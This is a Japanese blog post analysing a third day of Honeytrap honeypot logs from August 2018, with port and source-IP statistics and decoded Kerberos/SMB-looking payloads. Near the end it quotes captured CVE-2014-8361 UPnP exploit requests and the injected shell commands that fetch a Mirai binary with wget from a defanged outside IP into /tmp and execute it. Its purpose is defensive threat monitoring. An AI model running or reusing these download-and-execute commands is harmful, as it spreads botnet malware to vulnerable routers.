ハニーポット分析（3日目:2018/8/10）

3日目である 2018/8/10 のハニーポット分析です。
今回、WoWHoneypotのログも分析しようと思いましたが、誤ってデリートしてしまいました。。。。よって、今回は Honeytrapのみの分析となります。

1.Honeytrap
検知数：8,503 件
＜宛先ポートごとの検知数 TOP10＞

ポート	件数	割合	サービス
445	2,619	33.86%	SMB
23	1,452	18.77%	TELNET
3306	478	6.18%	MySQL
5900	346	4.47%	VNC
2323	165	2.13%	TELNET
52869	84	1.09%	D-Link, Realtek SDK
1433	65	0.84%	Microsoft SQL Server
20000	63	0.81%	?
3389	54	0.70%	RDP
8080	54	0.70%	PROXY

今回は宛先ポート番号は 20000 が増加していました。ポート番号 20000について、調べて見たのですが、サービスを断定することが出来ませんでした。検知内容は HEX形式でエンコードされているため、いくつかデコードして見ました。
・^0\ P¢NM£0 ¡0krbtgtNM¥19700101000000Z§¹Ù¨0
・¤ÿSMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12

読める文字列から推測すると KerberosおよびSMBに関する通信を思われます。何かの脆弱性を狙った可能性もありますが、調査までは出来ていません。他の検知については、1日目および2日目と大きく変わっている通信はありませんでした。

＜送信元IPごとにおける検知数 TOP10＞

送信元IP	ブラックリスト	検知数	割合
185.209.0.xx	×	430	11.93%
185.209.0.xy	×	363	10.07%
185.156.177.xxx	×	71	1.97%
80.211.67.xxx	○	56	1.55%
46.166.148.xxx	×	36	1.00%
176.58.97.xxx	×	34	0.94%
139.162.183.xx	○	33	0.92%
50.116.56.xxx	○	33	0.92%
66.228.48.xx	×	33	0.92%
172.104.240.xx	×	32	0.89%

今回、送信元IPごとの傾向を調べて見ました。ブラックリストは Cisco Talos および X-Force を利用して調査しました。
検知数の多い185.209.0.xx , 185.209.0.xy は様々なハイポートに対してアクセスしているため、ポートスキャンを行なっていると思われます。

ブラックリストへ登録されている送信元IPの通信内容については以下となります。
▪️ 80.211.67.xxx
CVE-2014-8361 の脆弱性を狙ったものであり、リクエスト内容は以下となります。

POST /picsdesc.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64

POST /wanipcn.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
実際に検知したコマンド部分を確認したところ、ダウンロードしてくるマルウェアは Mirai関連でした(VirusTotalで確認)
・cd /tmp/;wget http[:]//212[.]237[.]32[.]62/mips -O am
・cd /tmp/;chmod +x am;./am mips